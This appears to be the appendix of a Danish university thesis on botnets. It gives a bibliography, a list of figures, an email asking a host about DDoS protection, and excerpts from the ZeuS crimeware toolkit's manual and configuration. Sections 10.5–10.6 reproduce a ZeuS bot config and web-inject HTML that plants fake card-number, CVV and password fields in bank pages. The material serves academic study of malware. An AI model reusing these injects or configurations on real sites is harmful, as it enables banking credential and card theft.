10.1 Kildehenvisning
[1] Ross Anderson. Security Engineering. Wiley. ISBN: 978-0470068526. 2nd edition, 2008.
[2] Jan Trzaskowski et al. internetretten. Ex Tuto Puplishing. ISBN: 978-8799101832.
1st edition, 2008.
[3] Dave Chaffey. E-Business and E-Commerce Management: Strategy, Implementation and Practice.
Financial Times/ Prentice Hall. ISBN: 978-0273719601. 4th edition, 2009.
[4] Danmarks Straffelov. Justitsministeriet.
https://www.retsinformation.dk/Forms/R0710.aspx?id=138671
[5] US Computer Fraud and Abuse Act. Legal Information Institute.
http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001030----000-.html
[6] GB Computer Misuse Act. The National Archives.
http://www.legislation.gov.uk/ukpga/1990/18/contents
[7] An Introduction to Malware. Robin Sharp. Forår 2011.
[8] Malware & Software flaws. Slideshow fra T6 kursus på ITU. Freddie Drewsen. Forår 2010.
[9] Rapport fra analysearbejdet vedrørende Computer Network Operations. Forsvarets
Materieltjeneste, sektion for Anvendt Forskning. Maj 2008.
[10] Guide to Intrusion Detection and Prevention System. National Institute of Standards and
Technology. Special Publication 800-94. Februar 2007.
[11] Guide to Malware Incident Prevention and Handling. National Institute of Standards and
Technology. Special Publication 800-83. November 2005.
[12] Data Breach Investigations Report. Verizon. 2011.
[13] The Botnet Chronicles - A Journey to infamy. Trend Micro. November 2010.
[14] Taxonomy of Botnet Threats. Trend Micro. 2006
[15] A Survey of Botnet Technology and Defenses. M. Bailey et al. Marts 2009
[16] A Multi-Level Defense Against Social Engineering, D. Gragg, SANS Institute, 2003.
[17] The Urgency for Effective User Privacy-education to Counter Social Engineering Attacks on Secure
Computer Systems. G. L. Orgill et al. 2004.
[18] Detection of threats in Honeynet using Honeywall. N. Sharma et al. Oktober 2011.
[19] On the Analysis of the Zeus Botnet Crimeware Toolkit. H. Binsalleeh et al. 2010.
[20] W32.Stuxnet Dossier. Symantec Security Response. Version 1.4. 2011.
[21] Revisiting the Estonian Cyber Attacks: Digital Threats and Multinational Responses. S. Herzog.
Journal of Stategic Security. 2011.
[22] Zeus lækket på internettet. CSIS. Maj 2011.
http://www.csis.dk/en/csis/blog/3229
Daniel Jovanovic
66
[23] Cyber Banking Fraud - Global Partnerships Lead to Major Arrests. FBI. Oktober 2010.
http://www.fbi.gov/news/stories/2010/october/cyber-banking-fraud
[24] Want to rent an DDoS Attack? Damballa. August 2009.
http://blog.damballa.com/?p=330
[25] An Analysis of Conficker’s Logic and Rendezvous Points, SRI International. Marts 2009.
http://mtc.sri.com/Conficker/
[26] The Stacheldraht distributed denial of service attack tool. D. Dittrich. December 1999.
http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
[27] Computer Intruder Is Put on Probation And Fined $10,000. Maj 1990.
http://www.nytimes.com/1990/05/05/us/computer-intruder-is-put-on-probation-and-fined10000.html
[28] How a Bookmaker and a Whiz Kid Took On a DDOS-based Online Extortion Attack. Maj 2005.
http://www.csoonline.com/article/220336/how-a-bookmaker-and-a-whiz-kid-took-on-a-ddosbased-online-extortion-attack
[29] Anonymous vs Scientology.
https://whyweprotest.net/anonymous-scientology/
[30] Microsoft mod Kelihos botnettet. September 2011.
http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/0000-00-80-54/8816.Kelihos-Botnet-Complaint.pdf
[31] Computer Hacker Kevin Mitnick.
http://www.essortment.com/computer-hacker-kevin-mitnick-48526.html
[32] Computer Misuse Act cases.
http://www.computerevidence.co.uk/Cases/CMA.htm
[33] DK-CERT: Botnet viser problem med antivirus. Februar 2010.
http://www.computerworld.dk/art/55223/dk-cert-botnet-viser-problem-med-antivirus
[34] DK-CERT. Antivirus kan ikke stå alene. Februar 2011.
http://www.computerworld.dk/art/113751/dk-cert-antivirus-kan-ikke-staa-alene
[35] DK-CERT. 2011 blev året for de målrettet angreb. Januar 2012.
http://www.computerworld.dk/art/205335/dk-cert-2011-blev-aaret-for-de-maalrettede-angreb
[36] Fallit-erklæring: Globalt it-politi tabt på de bonede gulve. November 2011.
http://www.computerworld.dk/art/200157/fallit-erklaering-globalt-it-politi-tabt-paa-de-bonedegulve
[37] 100.000 danske pc'er fanget i botnet: It-branchen famler med løsninger. Januar 2011.
http://www.version2.dk/artikel/100000-danske-pcer-fanget-i-botnet-it-branchen-famler-medloesninger-17801
[38] European Commision - Digital Agenda for Europe.
http://ec.europa.eu/information_society/digital-agenda/index_en.htm
[39] Kommissionen vil forstærke EU's forsvar mod it-angreb. September 2010.
http://europa.eu/rapid/pressReleasesAction.do?reference=IP/10/1239&format=HTML&aged=1&la
nguage=DA&guiLanguage=en
[40] What is Cyber Clean Center.
https://www.ccc.go.jp/en_ccc/index.html
[41] Ny politistyrke i aktion på internettet. Februar 2012.
http://m.bt.dk/touch/article.pml;jsessionid=D33254B454CDE304C5A10C8C3C82A52D.uwportal3?guid=18752559
Alle webadresser er sidst kontrolleret for indhold den 28.2.2012.
ITU
67
10.2 Figurliste
Figur 1. It-relaterede værdier og trusler. .......................................................................... 8
Figur 2. Abstrakt botnet. .............................................................................................. 10
Figur 3. Opbygning af et centraliseret botnet. ................................................................. 12
Figur 4. Opbygning af et decentraliseret botnet. .............................................................. 13
Figur 5. Eksempel på metamorphism af en maskinkode.................................................... 17
Figur 6. Tabel over spredningsmekanismer. .................................................................... 18
Figur 7. Eksempel på botnet der udbydes til leje online .................................................... 27
Figur 8. Tabel over CNO’s forskellige delkapabiliteter ....................................................... 30
Figur 9. Antivirus advarsel angående ZeuS-malwaren Zbot. .............................................. 33
Figur 10. ZeuS installationsmenu................................................................................... 34
Figur 11. ZeuS kontrolpanel. ......................................................................................... 35
Figur 12. ZeuS Builder program. ................................................................................... 35
Figur 13. Resultat af et fremstillet webinject. .................................................................. 36
Figur 14. ZeuS’ forretningsmodel................................................................................... 37
Figur 15. ZeuS’ globale spredning.................................................................................. 38
Figur 16. Straffelovens tre beskyttelsesringe. .................................................................. 41
Figur 17. Japan’s CCC botnet-bekæmpelsesprocedurer ..................................................... 47
Figur 18. Spørgeskema anvendt i Social Engineering........................................................ 48
Figur 19. Resultater fra Social Engineering angreb ........................................................... 49
Figur 20. Overblik over typer af Social Engineering angreb. .............................................. 50
Figur 21. Omkostning af beskyttende modmidler i forhold til succesfulde angreb. ................ 61
Daniel Jovanovic
68
10.3 Spørgsmål til TDCHosting.dk
Fra: Daniel Jovanovic <
>
Dato: 26. jan. 2012 14.15
Emne: Angående beskyttelse mod botnet-angreb.
Til: [email protected]
Jeg har et teknisk spørgsmål angående jeres mulighed for at beskytte en webserver hostet hos jer
mod botnet-angreb.
Nærmere betegnet er jeg interesseret i at høre hvorledes I beskytter jeres nuværende og eventuelt
kommende kunder.
I skriver på jeres hjemmeside at jeres firewalls beskytter på flere lag, også imod diverse IP Denialof-Service angreb, men er dette tilstrækkelig hvis man bliver ramt af et DDoS angreb fra større
botnets? Herunder eksempelvis SYN flood og ICMP flood.
Med venlig hilsen / Best regards
Daniel Jovanovic
10.4 Skærmbillede af ZeuS database
ITU
69
10.5 Uddrag fra ZeuS Crimeware Toolkit manual
User guide
 Description
o Bot
o Control panel
 Configuration file
o HTTP-inject/HTTP-grabber
 Control panel
o Configuring the server
o Install
o Update
o File /system/fsarc.php
o Commands with remote scripts
 Work with Backconnect-server
 F.A.Q.
 Version history
Description: Bot
 Language and IDE programming:


Visual C++ (current version 9.0). No additional libraries are used (crtl, mfc, etc.).
Supported OS:
XP/Vista/Seven, as well as 2003/2003R2/2008/2008R2. Included work under Windows x64,
but only for 32-x bits processes. Also retained full bot work under active "Terminal Servers" sessions.
Action principle:
Bot is based on intercepting WinAPI, by splicing in ring3 (user mode), by running a copy of its code
in each process of the user (without using DLL).
[…]
Description: Control panel
 Programming language:


PHP, using the extensions mbstring, mysql.
Display statistics:
1. Number of infected computers.
2. Current number of bots in the online.
3. The number of new bots.
4. Daily activity of bots.
5. Country statistics.
6. Statistics by OS.
Working with the list of bots:
1. Filtering the list by country, botnets, IP-addresses, NAT-status, etc.
2. Displaying desktop screenshots in real time (only for bots outside NAT).
3. Mass inspection of the Socks-servers state.
4. Displays detailed information about the bots. Of the most important here are:
 Windows version, user language and time zone.
 Location and computer IP-address (not for local).
 internet connection speed (measured by calculating the load time of a
predetermined HTTP-resource).
[…]
Control panel: Commands, used in scripts
 os_shutdown



Shutdown computer. This command will be executed after the execution of the script, regardless
of position in the script.
os_reboot
Reboot computer. This command will be executed after the execution of the script, regardless of
position in the script.
bot_uninstall
Complete removal of the bot from the current user. This command will be executed after the
execution of the script, regardless of position in the script.
bot_update [url]
Update the bot configuration file.
[…]
Daniel Jovanovic
70
10.6 ZeuS konfigurationsfiler
Config.txt
;Build time:
;Version:
15:06:54 14.04.2011 GMT
2.0.8.9
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
Uddrag fra webinjects.txt
data_before
</big></B></font><BR><BR><big>
data_end
data_inject
In order to avoid fraud, we must verify your identity. We ask several questions.<br> Only
you can answer these questions. This information is used only for security <br>reasons, to
protect you from identity fraud.<br> Please make sure you complete all required information
correctly.
data_end
data_before
<tr valign=top><td colspan=2 class=inputField>
data_end
data_inject
<input id="password" name="password" maxlength="50" size="12" value="" autocomplete="OFF"
type="password"><br><br></td></tr><!-- --> <table border="0" cellpadding="0" cellspacing="0"
width="100%"><tbody><tr valign="top"><td align="left"><big><br> Enter the information about
Credit Card linked to your account: </big><br><br></td></tr></tbody></table> <tr><td
colspan="2"><b>ATM Card Number</b></td></tr><br> <tr valign="top"><td colspan="2"> <INPUT
TYPE="text" NAME="atm" VALUE="" SIZE="16" MAXLENGTH="16"><BR> </td></tr> <tr><td
colspan="2"><b>Expired Date</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT
TYPE="text" NAME="exp" VALUE="" SIZE="3" MAXLENGTH="5"></td></tr><BR> <tr><td
colspan="2"><b>CVV</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text"
NAME="cvv" VALUE="" SIZE="2" MAXLENGTH="3"><BR><br></td></tr> <table border="0"
cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td align="left"><big>
data_end
ITU
71
10.7 Designfejl, skriv dit password her
Daniel Jovanovic
72
10.8 Cyber Theft Ring
ITU
73